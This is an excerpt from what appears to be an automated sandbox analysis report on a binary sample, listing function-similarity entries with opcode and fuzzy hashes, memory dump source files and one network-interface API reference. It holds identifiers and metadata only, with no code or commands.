                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                      • Instruction ID: b7af57da6433f3daa10f96d4b329a952fb5590caec3fc8122bb4584d6efe45ca
                                                      • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                      • Instruction Fuzzy Hash: B031C431318B1A8BC718AD69C4C022AF6D3EBE8751F55873DE989C3380E9719C4D8682
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [
                                                      • API String ID: 0-784033777
                                                      • Opcode ID: 10a715da96ecf9828af49af4dfa4a83d8c6f53789b7dd0e844644c7dfc3ec04f
                                                      • Instruction ID: 8f3335ff6f40a2a1f804509e7cbf1293c026a00144d9e95cc7824c27f3b74116
                                                      • Opcode Fuzzy Hash: 10a715da96ecf9828af49af4dfa4a83d8c6f53789b7dd0e844644c7dfc3ec04f
                                                      • Instruction Fuzzy Hash: C2B146729083957BDB368A2488A577AFFD8FF55304F18C92EE8C5C6181EB35DC448B52
                                                      APIs
                                                      • if_indextoname.IPHLPAPI(C484002E,C483FFEB), ref: 005842FA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: if_indextoname
                                                      • String ID: %$%lu
                                                      • API String ID: 1170979652-938625555
                                                      • Opcode ID: 5505a1f60e56f76a0a4efd51fa76e2f70ea2da1dca60e19cae7576a274e9e8f5
                                                      • Instruction ID: 441394e37607459484e4e32e7f435aac32d944b3afed8423e57dd1e0985fd7d2
                                                      • Opcode Fuzzy Hash: 5505a1f60e56f76a0a4efd51fa76e2f70ea2da1dca60e19cae7576a274e9e8f5
                                                      • Instruction Fuzzy Hash: B61190B550425227EB102510DC467FB3E54BBA5308F140829FD88E7243F6669C4ADFE2